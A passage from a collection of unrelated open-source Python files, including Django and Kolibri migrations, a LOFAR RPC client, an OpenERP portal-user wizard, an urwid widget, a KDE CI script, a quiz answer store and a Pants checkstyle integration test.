('product_class', models.CharField(blank=True, max_length=10, null=True)),
('upload_date', models.CharField(blank=True, max_length=30, null=True)),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ad_date', models.CharField(blank=True, default=None, max_length=20, null=True)),
('item_no', models.CharField(blank=True, max_length=30, null=True, unique=True)),
('mfg', models.CharField(blank=True, max_length=30, null=True)),
('desc', models.CharField(blank=True, max_length=200, null=True)),
('vendor_number', models.CharField(blank=True, max_length=30, null=True)),
('order_date', models.DateField(blank=True, null=True)),
('received_dc', models.DateField(blank=True, null=True)),
('received_137', models.CharField(blank=True, max_length=30, null=True)),
('received_buyer', models.CharField(blank=True, max_length=40, null=True)),
('received_other', models.CharField(blank=True, default=None, max_length=50, null=True)),
('photo_dldate', models.CharField(blank=True, max_length=50, null=True)),
('whowhen', models.CharField(blank=True, max_length=100, null=True)),
('studio_out', models.DateField(blank=True, null=True)),
('checked_out', models.CharField(blank=True, max_length=100, null=True)),
('have_image', models.CharField(blank=True, max_length=30, null=True)),
('confirmed_placed', models.CharField(blank=True, default='None', max_length=200, null=True)),
('shooting_instructions', models.CharField(blank=True, default=None, max_length=200, null=True)),
('studio_in', models.CharField(blank=True, max_length=50, null=True)),
('notes', models.CharField(blank=True, max_length=200, null=True)),
('item_ns', models.CharField(blank=True, max_length=30, null=True)),
('short_sku', models.CharField(blank=True, max_length=30, null=True)),
('from_file', models.CharField(blank=True, max_length=30, null=True)),
('sku', models.CharField(blank=True, max_length=30, null=True)),
('sku_ns', models.CharField(blank=True, max_length=30, null=True)),
('first', models.CharField(blank=True, max_length=5, null=True)),
('first_date', models.CharField(blank=True, max_length=30, null=True)),
('buyer', models.CharField(blank=True, max_length=50, null=True)),
('merch_to_137', models.CharField(blank=True, max_length=200, null=True)),
('dc_received_u', models.IntegerField(blank=True, null=True)),
('curr_dc_oh_u', models.IntegerField(blank=True, null=True)),
('dc_curr_oo_u', models.IntegerField(blank=True, null=True)),
('na', models.CharField(blank=True, max_length=5, null=True)),
('size_type', models.CharField(blank=True, max_length=10, null=True)),
('color_desc', models.CharField(blank=True, max_length=200, null=True)),
('product_class', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='b5.Buyers', to_field='product_class')),
],
),
migrations.CreateModel(
name='RegularWebfiles',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('long_sku', models.CharField(max_length=30)),
('filename', models.CharField(max_length=50)),
('item_ns', models.CharField(max_length=30, null=True)),
('sku', models.CharField(max_length=30, null=True)),
('sku_ns', models.CharField(max_length=30, null=True)),
],
),
migrations.CreateModel(
name='ReplacedImage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sku', models.CharField(blank=True, max_length=30, null=True)),
('sku_ns', models.CharField(blank=True, max_length=30, null=True)),
('item_no', models.CharField(blank=True, max_length=30, null=True)),
('item_ns', models.CharField(blank=True, max_length=30, null=True)),
('old_filename', models.CharField(blank=True, max_length=50, null=True)),
('new_filename', models.CharField(blank=True, max_length=50, null=True)),
('change_date', models.DateField(blank=True, default=datetime.date.today, null=True)),
],
),
migrations.CreateModel(
name='RumbaProduct',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('item_no', models.CharField(blank=True, max_length=30, null=True)),
('mfg', models.CharField(blank=True, max_length=30, null=True)),
('desc', models.CharField(blank=True, max_length=200, null=True)),
('vendor_number', models.CharField(blank=True, max_length=30, null=True)),
('confirmed_placed', models.CharField(blank=True, default='None', max_length=200, null=True)),
('item_ns', models.CharField(blank=True, max_length=30, null=True)),
('short_sku', models.CharField(blank=True, max_length=30, null=True)),
('sku', models.CharField(blank=True, max_length=30, null=True)),
('sku_ns', models.CharField(blank=True, max_length=30, null=True)),
('product_class', models.CharField(blank=True, max_length=4, null=True)),
('merch_to_137', models.CharField(blank=True, max_length=200, null=True)),
('dc_received_u', models.IntegerField(blank=True, null=True)),
('curr_dc_oh_u', models.IntegerField(blank=True, null=True)),
('dc_curr_oo_u', models.IntegerField(blank=True, null=True)),
('size_type', models.CharField(blank=True, max_length=10, null=True)),
('size', models.CharField(blank=True, max_length=10, null=True)),
('color_desc', models.CharField(blank=True, max_length=200, null=True)),
],
),
migrations.CreateModel(
name='ThumbWebfiles',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('long_sku', models.CharField(max_length=30)),
('filename', models.CharField(max_length=50)),
('item_ns', models.CharField(max_length=30, null=True)),
('sku', models.CharField(max_length=30, null=True)),
('sku_ns', models.CharField(max_length=30, null=True)),
],
),
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fullname', models.CharField(max_length=64)),
('position', models.CharField(blank=True, max_length=64, null=True)),
('phone', models.CharField(blank=True, max_length=15, null=True)),
('extension', models.CharField(blank=True, max_length=15, null=True)),
('mobile', models.CharField(blank=True, max_length=15, null=True)),
('fax', models.CharField(blank=True, max_length=15, null=True)),
('notes', models.TextField(blank=True, max_length=2000, null=True)),
('email', models.EmailField(max_length=254)),
('user', models.OneToOneField(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['user__last_name'],
},
),
migrations.CreateModel(
name='WatchedItem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('item_no', models.CharField(blank=True, max_length=30, null=True)),
('desc', models.CharField(blank=True, max_length=210, null=True)),
('comments', models.TextField(blank=True, max_length=2000, null=True)),
('confirmed_placed', models.CharField(blank=True, default=None, max_length=200, null=True)),
('watched_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='b5.UserProfile')),
],
),
migrations.AddField(
model_name='replacedimage',
name='processor',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='b5.UserProfile'),
),
migrations.AddField(
model_name='oneimagefiles',
name='filenames',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='b5.PrintFile'),
),
migrations.AlterUniqueTogether(
name='inventoryproduct',
unique_together=set([('sku', 'source')]),
),
migrations.AddField(
model_name='department',
name='member',
field=models.ManyToManyField(to='b5.UserProfile'),
),
]
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.13 on 2018-06-26 17:55
from __future__ import unicode_literals
import django.contrib.postgres.fields.jsonb
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('contentcuration', '0085_user_policies'),
]
operations = [
migrations.AlterField(
model_name='channel',
name='content_defaults',
field=django.contrib.postgres.fields.jsonb.JSONField(default={b'author': None, b'auto_derive_audio_thumbnail': True, b'auto_derive_document_thumbnail': True, b'auto_derive_exercise_thumbnail': True, b'auto_derive_html5_thumbnail': True,
b'auto_derive_video_thumbnail': True, b'auto_randomize_questions': True, b'copyright_holder': None, b'language': None, b'license': None, b'license_description': None, b'm_value': 5, b'mastery_model': b'num_correct_in_a_row_5', b'n_value': 5}),
),
migrations.AlterField(
model_name='user',
name='content_defaults',
field=django.contrib.postgres.fields.jsonb.JSONField(default={b'author': None, b'auto_derive_audio_thumbnail': True, b'auto_derive_document_thumbnail': True, b'auto_derive_exercise_thumbnail': True, b'auto_derive_html5_thumbnail': True,
b'auto_derive_video_thumbnail': True, b'auto_randomize_questions': True, b'copyright_holder': None, b'language': None, b'license': None, b'license_description': None, b'm_value': 5, b'mastery_model': b'num_correct_in_a_row_5', b'n_value': 5}),
),
migrations.AlterField(
model_name='user',
name='information',
field=django.contrib.postgres.fields.jsonb.JSONField(null=True),
),
migrations.AlterField(
model_name='user',
name='policies',
field=django.contrib.postgres.fields.jsonb.JSONField(default=dict),
),
]
|
#!/usr/bin/python
import sys
import logging
from optparse import OptionParser
from lofar.messaging.RPC import RPC, RPCException, RPCWrapper
from lofar.mom.momqueryservice.config import DEFAULT_MOMQUERY_BUSNAME, DEFAULT_MOMQUERY_SERVICENAME
''' Simple RPC client for Service momqueryservice
'''
logger = logging.getLogger(__file__)
class MoMQueryRPC(RPCWrapper):
def getProjectDetails(self, ids):
'''get the project details for one or more mom ids
:param ids single or list of mom ids
:rtype dict with project details'''
if isinstance(ids, int) or isinstance(ids, str):
ids = [ids]
ids = [str(x) for x in ids]
ids_string = ', '.join(ids)
logger.info("Requesting details for mom objects: %s" % (str(ids_string)))
result = self.rpc('GetProjectDetails', mom_ids=ids_string)
logger.info("Received details for %s mom objects" % (len(result)))
return result
def getProjects(self):
'''get all projects
:rtype dict with all projects'''
logger.info("Requesting all projects")
projects = self.rpc('GetProjects')
for project in projects:
project['statustime'] = project['statustime'].datetime()
logger.info("Received %s projects" % (len(projects)))
return projects
def main():
# Check the invocation arguments
parser = OptionParser('%prog [options]',
description='do requests to the momqueryservice from the commandline')
parser.add_option('-q', '--broker', dest='broker', type='string', default=None, help='Address of the qpid broker, default: localhost')
parser.add_option('-b', '--busname', dest='busname', type='string', default=DEFAULT_MOMQUERY_BUSNAME, help='Name of the bus exchange on the qpid broker, default: [%default]')
parser.add_option('-s', '--servicename', dest='servicename', type='string', default=DEFAULT_MOMQUERY_SERVICENAME, help='Name for this service, default: [%default]')
parser.add_option('-V', '--verbose', dest='verbose', action='store_true', help='verbose logging')
parser.add_option('-P', '--projects', dest='projects', action='store_true', help='get list of all projects')
parser.add_option('-p', '--project_details', dest='project_details', type='int', help='get project details for mom object with given id')
(options, args) = parser.parse_args()
if len(sys.argv) == 1:
parser.print_help()
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',
level=logging.INFO if options.verbose else logging.WARN)
with MoMQueryRPC(busname=options.busname, servicename=options.servicename, broker=options.broker) as rpc:
if options.projects:
projects = rpc.getProjects()
for project in projects:
print project
if options.project_details:
projects_details = rpc.getProjectDetails(options.project_details)
if projects_details:
for k, v in projects_details.items():
print ' %s: %s' % (k, v)
else:
print 'No results'
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2011 OpenERP S.A (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
import random
from openerp.osv import fields, osv
from openerp.tools.translate import _
from openerp.tools import email_split
from openerp import SUPERUSER_ID
_logger = logging.getLogger(__name__)
# welcome email sent to portal users
# (note that calling '_' has no effect except exporting those strings for translation)
WELCOME_EMAIL_SUBJECT = _("Your OpenERP account at %(company)s")
WELCOME_EMAIL_BODY = _("""Dear %(name)s,
You have been given access to %(portal)s.
Your login account data is:
Database: %(db)s
Username: %(login)s
In order to complete the signin process, click on the following url:
%(url)s
%(welcome_message)s
--
OpenERP - Open Source Business Applications
http://www.openerp.com
""")
def extract_email(email):
""" extract the email address from a user-friendly email address """
addresses = email_split(email)
return addresses[0] if addresses else ''
class wizard(osv.osv_memory):
"""
A wizard to manage the creation/removal of portal users.
"""
_name = 'portal.wizard'
_description = 'Portal Access Management'
_columns = {
'portal_id': fields.many2one('res.groups', domain=[('is_portal', '=', True)], required=True,
string='Portal', help="The portal that users can be added in or removed from."),
'user_ids': fields.one2many('portal.wizard.user', 'wizard_id', string='Users'),
'welcome_message': fields.text(string='Invitation Message',
help="This text is included in the email sent to new users of the portal."),
}
def _default_portal(self, cr, uid, context):
portal_ids = self.pool.get('res.groups').search(cr, uid, [('is_portal', '=', True)])
return portal_ids and portal_ids[0] or False
_defaults = {
'portal_id': _default_portal,
}
def onchange_portal_id(self, cr, uid, ids, portal_id, context=None):
# for each partner, determine corresponding portal.wizard.user records
res_partner = self.pool.get('res.partner')
partner_ids = context and context.get('active_ids') or []
contact_ids = set()
user_changes = []
for partner in res_partner.browse(cr, SUPERUSER_ID, partner_ids, context):
for contact in (partner.child_ids or [partner]):
# make sure that each contact appears at most once in the list
if contact.id not in contact_ids:
contact_ids.add(contact.id)
in_portal = False
if contact.user_ids:
in_portal = portal_id in [g.id for g in contact.user_ids[0].groups_id]
user_changes.append((0, 0, {
'partner_id': contact.id,
'email': contact.email,
'in_portal': in_portal,
}))
return {'value': {'user_ids': user_changes}}
def action_apply(self, cr, uid, ids, context=None):
wizard = self.browse(cr, uid, ids[0], context)
portal_user_ids = [user.id for user in wizard.user_ids]
self.pool.get('portal.wizard.user').action_apply(cr, uid, portal_user_ids, context)
return {'type': 'ir.actions.act_window_close'}
class wizard_user(osv.osv_memory):
"""
A model to configure users in the portal wizard.
"""
_name = 'portal.wizard.user'
_description = 'Portal User Config'
_columns = {
'wizard_id': fields.many2one('portal.wizard', string='Wizard', required=True, ondelete="cascade"),
'partner_id': fields.many2one('res.partner', string='Contact', required=True, readonly=True),
'email': fields.char(size=240, string='Email'),
'in_portal': fields.boolean('In Portal'),
}
def create(self, cr, uid, values, context=None):
""" overridden to update the partner's email (if necessary) """
id = super(wizard_user, self).create(cr, uid, values, context)
wuser = self.browse(cr, uid, id, context)
if wuser.partner_id.email != wuser.email:
wuser.partner_id.write({'email': wuser.email})
return id
def action_apply(self, cr, uid, ids, context=None):
self.pool['res.partner'].check_access_rights(cr, uid, 'write')
for wizard_user in self.browse(cr, SUPERUSER_ID, ids, context):
portal = wizard_user.wizard_id.portal_id
if not portal.is_portal:
raise osv.except_osv("Error", "Not a portal: " + portal.name)
user = self._retrieve_user(cr, SUPERUSER_ID, wizard_user, context)
if wizard_user.in_portal:
# create a user if necessary, and make sure it is in the portal group
if not user:
user = self._create_user(cr, SUPERUSER_ID, wizard_user, context)
if (not user.active) or (portal not in user.groups_id):
user.write({'active': True, 'groups_id': [(4, portal.id)]})
# prepare for the signup process
user.partner_id.signup_prepare()
wizard_user = self.browse(cr, SUPERUSER_ID, wizard_user.id, context)
self._send_email(cr, uid, wizard_user, context)
else:
# remove the user (if it exists) from the portal group
if user and (portal in user.groups_id):
# if user belongs to portal only, deactivate it
if len(user.groups_id) <= 1:
user.write({'groups_id': [(3, portal.id)], 'active': False})
else:
user.write({'groups_id': [(3, portal.id)]})
def _retrieve_user(self, cr, uid, wizard_user, context=None):
""" retrieve the (possibly inactive) user corresponding to wizard_user.partner_id
@param wizard_user: browse record of model portal.wizard.user
@return: browse record of model res.users
"""
if wizard_user.partner_id.user_ids:
return wizard_user.partner_id.user_ids[0]
# the user may be inactive, search for it
res_users = self.pool.get('res.users')
domain = [('partner_id', '=', wizard_user.partner_id.id), ('active', '=', False)]
user_ids = res_users.search(cr, uid, domain)
return user_ids and res_users.browse(cr, uid, user_ids[0], context) or False
def _create_user(self, cr, uid, wizard_user, context=None):
""" create a new user for wizard_user.partner_id
@param wizard_user: browse record of model portal.wizard.user
@return: browse record of model res.users
"""
res_users = self.pool.get('res.users')
create_context = dict(context or {}, noshortcut=True) # to prevent shortcut creation
values = {
'login': extract_email(wizard_user.email),
'partner_id': wizard_user.partner_id.id,
'groups_id': [(6, 0, [])],
'share': True,
}
user_id = res_users.create(cr, uid, values, context=create_context)
return res_users.browse(cr, uid, user_id, context)
def _send_email(self, cr, uid, wizard_user, context=None):
""" send notification email to a new portal user
@param wizard_user: browse record of model portal.wizard.user
@return: the id of the created mail.mail record
"""
this_context = context
this_user = self.pool.get('res.users').browse(cr, SUPERUSER_ID, uid, context)
if not this_user.email:
raise osv.except_osv(_('Email Required'),
_('You must have an email address in your User Preferences to send emails.'))
# determine subject and body in the portal user's language
user = self._retrieve_user(cr, SUPERUSER_ID, wizard_user, context)
context = dict(this_context or {}, lang=user.lang)
data = {
'company': this_user.company_id.name,
'portal': wizard_user.wizard_id.portal_id.name,
'welcome_message': wizard_user.wizard_id.welcome_message or "",
'db': cr.dbname,
'name': user.name,
'login': user.login,
'url': user.signup_url,
}
mail_mail = self.pool.get('mail.mail')
mail_values = {
'email_from': this_user.email,
'email_to': user.email,
'subject': _(WELCOME_EMAIL_SUBJECT) % data,
'body_html': '<pre>%s</pre>' % (_(WELCOME_EMAIL_BODY) % data),
'state': 'outgoing',
'type': 'email',
}
mail_id = mail_mail.create(cr, uid, mail_values, context=this_context)
return mail_mail.send(cr, uid, [mail_id], context=this_context)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
# -*- coding: utf-8 -*-
import urwid
__author__ = 'Sumin Byeon'
__version__ = '0.1.3'
__all__ = ['StackedWidget']
class StackedWidget(urwid.Widget):
"""A widget container that presents one child widget at a time."""
#: A list containing all widgets
widgets = []
#: An index of the current widget
current = 0
def __init__(self):
self.widgets = []
self.current = 0
def push_widget(self, widget):
"""Appends a widget at the end of the list."""
self.widgets.append(widget)
def insert_widget(self, index, widget):
"""Inserts a widget at a given index."""
self.widgets.insert(index, widget)
def pop_widget(self):
"""Retrieves and removes the last widget (with the maximum index)."""
n = len(self.widgets)
assert n > 0
widget = self.widgets.pop()
if self.current == n - 1:
self.current -= 1
self._invalidate()
return widget
def show_widget(self, index):
assert 0 <= index < len(self.widgets)
self.current = index
self._invalidate()
def show_next_widget(self):
n = self.widget_count
self.show_widget((self.current + 1) % n)
def show_previous_widget(self):
n = self.widget_count
self.show_widget((self.current - 1 + n) % n)
@property
def widget_count(self):
"""The function name is pretty much self-explanatory."""
return len(self.widgets)
@property
def current_widget(self):
"""Returns a widget that is currently being rendered. If the widget
list is empty, it returns None."""
if self.widget_count > 0:
return self.widgets[self.current]
else:
return None
def selectable(self):
"""It appears ``selectable()`` must return ``True`` in order to get any
key input."""
return True
def render(self, size, focus=False):
assert self.current_widget is not None
return self.current_widget.render(size, focus)
def keypress(self, size, key):
"""Passes key inputs to the current widget. If the current widget is
``None`` then it returns the given key input so that
``unhandled_input`` function can handle it."""
if self.current_widget is not None:
return self.current_widget.keypress(size, key)
else:
return key
def mouse_event(self, size, event, button, col, row, focus):
if self.current_widget is not None:
return self.current_widget.mouse_event(
size, event, button, col, row, focus)
else:
return False
|
#!/usr/bin/python
import sys
import time
import argparse
from kdecilib import *
# Load our command line arguments
parser = argparse.ArgumentParser(description='Utility to initialize a git repository before handover to the build executor.')
parser.add_argument('--project', type=str)
parser.add_argument('--branchGroup', type=str, default='latest-qt4')
parser.add_argument('--sources', type=str)
parser.add_argument('--delay', type=int, default=10)
parser.add_argument('--platform', type=str, choices=['linux64-g++', 'darwin-mavericks', 'windows64-vs2013'], default='linux64-g++')
parser.add_argument('--compiler', type=str, choices=['gcc', 'clang', 'mingw', 'vs2013'], default='gcc')
# Parse the arguments
environmentArgs = check_jenkins_environment()
arguments = parser.parse_args( namespace=environmentArgs )
# Load the various configuration files, and the projects
config = load_project_configuration( arguments.project, arguments.branchGroup, arguments.platform, arguments.compiler )
if not load_projects( 'kde_projects.xml', 'http://projects.kde.org/kde_projects.xml', 'config/projects', 'dependencies/logical-module-structure' ):
sys.exit("Failure to load projects - unable to continue")
# Load the requested project
project = ProjectManager.lookup( arguments.project )
if project is None:
sys.exit("Requested project %s was not found." % arguments.project)
# First we must wait for the anongit mirrors to settle
time.sleep( arguments.delay )
# Prepare the sources and handover to Jenkins
manager = BuildManager(project, arguments.branchGroup, arguments.sources, config, arguments.platform)
print "\nPreparing to perform KDE Continuous Integration build"
print "== Setting Up Sources\n"
manager.checkout_sources()
print "\n== Cleaning Source Tree\n"
manager.cleanup_sources()
|
# Copyright (C) 2013 W. Trevor King <[email protected]>
#
# This file is part of quizzer.
#
# quizzer is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# quizzer is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# quizzer. If not, see <http://www.gnu.org/licenses/>.
import codecs as _codecs
import datetime as _datetime
import json as _json
from . import __version__
class AnswerDatabase (dict):
def __init__(self, path=None, encoding=None):
super(AnswerDatabase, self).__init__()
self.path = path
self.encoding = encoding
def _open(self, mode='r', path=None, encoding=None):
if path:
self.path = path
if encoding:
self.encoding = encoding
return _codecs.open(self.path, mode, self.encoding)
def load(self, **kwargs):
with self._open(mode='r', **kwargs) as f:
data = _json.load(f)
version = data.get('version', None)
if version != __version__:
try:
upgrader = getattr(
self, '_upgrade_from_{}'.format(version.replace('.', '_')))
except AttributeError as e:
raise NotImplementedError('upgrade from {} to {}'.format(
version, __version__)) from e
data = upgrader(data)
self.update(data['answers'])
if '' in self:
self[None] = self.pop('')
def save(self, **kwargs):
answers = dict(self)
if None in answers:
answers[''] = answers.pop(None)
data = {
'version': __version__,
'answers': answers,
}
with self._open(mode='w', **kwargs) as f:
_json.dump(
data, f, indent=2, separators=(',', ': '), sort_keys=True)
f.write('\n')
def add(self, question, answer, correct, user=None):
if user == '':
raise ValueError('the empty string is an invalid username')
if user not in self:
self[user] = {}
if question.id not in self[user]:
self[user][question.id] = []
timezone = _datetime.timezone.utc
timestamp = _datetime.datetime.now(tz=timezone).isoformat()
self[user][question.id].append({
'answer': answer,
'correct': correct,
'timestamp': timestamp,
})
def get_answers(self, user=None):
if user == '':
raise ValueError('the empty string is an invalid username')
return self.get(user, {})
def _get_questions(self, check, questions, user=None):
if user == '':
raise ValueError('the empty string is an invalid username')
answers = self.get_answers(user=user)
return [q for q in questions if check(question=q, answers=answers)]
def get_answered(self, **kwargs):
return self._get_questions(
check=lambda question, answers: question.id in answers,
**kwargs)
def get_unanswered(self, **kwargs):
return self._get_questions(
check=lambda question, answers: question.id not in answers,
**kwargs)
def get_correctly_answered(self, **kwargs):
return self._get_questions(
check=lambda question, answers:
True in [a['correct'] for a in answers.get(question.id, [])],
**kwargs)
def get_never_correctly_answered(self, **kwargs):
return self._get_questions(
check=lambda question, answers:
True not in [a['correct']
for a in answers.get(question.id, [])],
**kwargs)
def _upgrade_from_0_1(self, data):
data['version'] = __version__
data['answers'] = {'': data['answers']} # add user-id key
return data
_upgrade_from_0_2 = _upgrade_from_0_1
_upgrade_from_0_3 = _upgrade_from_0_1
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import json
import os
import shutil
from builtins import open
from contextlib import contextmanager
from textwrap import dedent
from pants.base.build_environment import get_buildroot
from pants.util.contextutil import temporary_dir
from pants_test.pants_run_integration_test import PantsRunIntegrationTest, ensure_cached
class CheckstyleIntegrationTest(PantsRunIntegrationTest):
def _create_config_file(self, filepath, rules_xml=''):
with open(filepath, 'w') as f:
f.write(dedent(
"""<?xml version="1.0"?>
<!DOCTYPE module PUBLIC
"-//Puppy Crawl//DTD Check Configuration 1.3//EN"
"http://www.puppycrawl.com/dtds/configuration_1_3.dtd">
<module name="Checker">
{rules_xml}
</module>""".format(rules_xml=rules_xml)))
@ensure_cached(expected_num_artifacts=2)
def test_config_invalidates_targets(self, cache_args):
with self.temporary_workdir() as workdir:
with temporary_dir(root_dir=get_buildroot()) as tmp:
configs = [
dedent("""
<module name="TreeWalker">
<property name="tabWidth" value="2"/>
</module>"""),
dedent("""
<module name="TreeWalker">
<module name="LineLength">
<property name="max" value="100"/>
</module>
</module>""")
]
for config in configs:
# Ensure that even though the config files have the same name, their
# contents will invalidate the targets.
config_file = os.path.join(tmp, 'config.xml')
self._create_config_file(config_file, config)
args = [
'clean-all',
'lint.checkstyle',
cache_args,
'examples/src/java/org/pantsbuild/example/hello/simple',
'--lint-checkstyle-configuration={}'.format(config_file)
]
pants_run = self.run_pants_with_workdir(args, workdir)
self.assert_success(pants_run)
@ensure_cached(expected_num_artifacts=2)
def test_config_name_invalidates_targets(self, cache_args):
with self.temporary_workdir() as workdir:
with temporary_dir(root_dir=get_buildroot()) as tmp:
config_names = ['one.xml', 'two.xml']
config = dedent("""
<module name="TreeWalker">
<property name="tabWidth" value="2"/>
</module>""")
for config_name in config_names:
# Ensure that even though the config files have the same name, their contents will
# invalidate the targets.
config_file = os.path.join(tmp, config_name)
self._create_config_file(config_file, config)
args = [
'lint.checkstyle',
cache_args,
'examples/src/java/org/pantsbuild/example/hello/simple',
'--lint-checkstyle-configuration={}'.format(config_file)
]
pants_run = self.run_pants_with_workdir(args, workdir)
self.assert_success(pants_run)
@contextmanager
def _temporary_buildroot(self, files_to_copy, current_root=None):
if current_root is None:
current_root = get_buildroot()
files_to_copy = set(files_to_copy)
files_to_copy.update(f for f in os.listdir(current_root)
if f.endswith('.ini') or f.startswith('BUILD'))
files_to_copy.update((
'pants',
'3rdparty',
'build-support',
'contrib',
'pants-plugins',
'src',
))
with temporary_dir() as temp_root:
temp_root = os.path.normpath(temp_root)
for path in files_to_copy:
src = os.path.join(current_root, path)
dst = os.path.join(temp_root, path)
if os.path.isdir(path):
shutil.copytree(src, dst)
else:
shutil.copyfile(src, dst)
current = os.getcwd()
try:
os.chdir(temp_root)
temp_root = os.getcwd()
yield temp_root
finally:
os.chdir(current)
def _temporary_buildroots(self, files_to_copy=None, current_root=None, iterations=2):
while iterations:
with self._temporary_buildroot(files_to_copy, current_root) as root:
yield root
iterations -= 1
@ensure_cached(expected_num_artifacts=1)
def test_config_buildroot_does_not_invalidate_targets(self, cache_args):
previous_names = set()
for buildroot in self._temporary_buildroots(['examples']):
with self.temporary_workdir() as workdir:
tmp = os.path.join(buildroot, 'tmp')
os.mkdir(tmp)
config = dedent("""
<module name="TreeWalker">
<property name="tabWidth" value="2"/>
</module>""")
# Ensure that even though the config files have the same name, their
# contents will invalidate the targets.
config_file = os.path.join(tmp, 'one.xml')
self.assertNotIn(config_file, previous_names)
previous_names.add(config_file)
self._create_config_file(config_file, config)
args = [
'lint.checkstyle',
cache_args,
'examples/src/java/org/pantsbuild/example/hello/simple',
'--lint-checkstyle-configuration={}'.format(config_file),
]
pants_run = self.run_pants_with_workdir(args, workdir)
self.assert_success(pants_run)
@ensure_cached(expected_num_artifacts=1)
def test_properties_file_names_does_not_invalidates_targets(self, cache_args):
with self.temporary_workdir() as workdir:
with temporary_dir(root_dir=get_buildroot()) as tmp:
suppression_names = ['one-supress.xml', 'two-supress.xml']
suppression_data = dedent("""
<?xml version="1.0"?>
<!DOCTYPE suppressions PUBLIC
"-//Puppy Crawl//DTD Suppressions 1.1//EN"
"http://www.puppycrawl.com/dtds/suppressions_1_1.dtd">
<suppressions>
<suppress files=".*/bad-files/.*\.java" checks=".*"/>
</suppressions>
""").strip()
for suppression_name in suppression_names:
suppression_file = os.path.join(tmp, suppression_name)
self._create_config_file(suppression_file, suppression_data)
properties = {
'checkstyle.suppression.files': suppression_file,
}
args = [
'lint.checkstyle',
cache_args,
'examples/src/java/org/pantsbuild/example/hello/simple',
"--lint-checkstyle-properties={}".format(json.dumps(properties)),
]
pants_run = self.run_pants_with_workdir(args, workdir)
self.assert_success(pants_run)
@ensure_cached(expected_num_artifacts=2)
def test_properties_file_contents_invalidates_targets(self, cache_args):
with self.temporary_workdir() as workdir:
with temporary_dir(root_dir=get_buildroot()) as tmp:
suppression_files = [
dedent("""
<?xml version="1.0"?>
<!DOCTYPE suppressions PUBLIC
"-//Puppy Crawl//DTD Suppressions 1.1//EN"
"http://www.puppycrawl.com/dtds/suppressions_1_1.dtd">
<suppressions>
<suppress files=".*/bad-files/.*\.java" checks=".*"/>
</suppressions>
""").strip(),
dedent("""
<?xml version="1.0"?>
<!DOCTYPE suppressions PUBLIC
"-//Puppy Crawl//DTD Suppressions 1.1//EN"
"http://www.puppycrawl.com/dtds/suppressions_1_1.dtd">
<suppressions>
<suppress files=".*/bad-files/.*\.java" checks=".*"/>
<suppress files=".*/really-bad-files/.*\.java" checks=".*"/>
</suppressions>
""").strip(),
]
for suppressions in suppression_files:
suppression_file = os.path.join(tmp, 'suppressions.xml')
self._create_config_file(suppression_file, suppressions)
properties = {
'checkstyle.suppression.files': suppression_file,
}
args = [
'lint.checkstyle',
cache_args,
'examples/src/java/org/pantsbuild/example/hello/simple',
"--lint-checkstyle-properties={}".format(json.dumps(properties)),
]
pants_run = self.run_pants_with_workdir(args, workdir)
self.assert_success(pants_run)
@ensure_cached(expected_num_artifacts=2)
def test_properties_nonfile_values_invalidates_targets(self, cache_args):
with self.temporary_workdir() as workdir:
with temporary_dir(root_dir=get_buildroot()):
values = ['this-is-not-a-file', '37']
for value in values:
properties = {
'my.value': value,
}
args = [
'lint.checkstyle',
cache_args,
'examples/src/java/org/pantsbuild/example/hello/simple',
"--lint-checkstyle-properties={}".format(json.dumps(properties)),
]
pants_run = self.run_pants_with_workdir(args, workdir)
self.assert_success(pants_run)
@ensure_cached(expected_num_artifacts=2)
def test_jvm_tool_changes_invalidate_targets(self, cache_args):
with self.temporary_workdir() as workdir:
# Ensure that only the second use of the default checkstyle will not invalidate anything.
for checkstyle_jar in (None, 'testprojects/3rdparty/checkstyle', None):
args = [
'lint.checkstyle',
cache_args,
'--checkstyle={}'.format(checkstyle_jar) if checkstyle_jar else '',
'examples/src/java/org/pantsbuild/example/hello/simple'
]
pants_run = self.run_pants_with_workdir(args, workdir)
print(pants_run.stdout_data)
self.assert_success(pants_run)
|
from __future__ import absolute_import
from __future__ import unicode_literals
import datetime
import docker
from .. import mock
from .. import unittest
from compose.config.config import Config
from compose.config.types import VolumeFromSpec
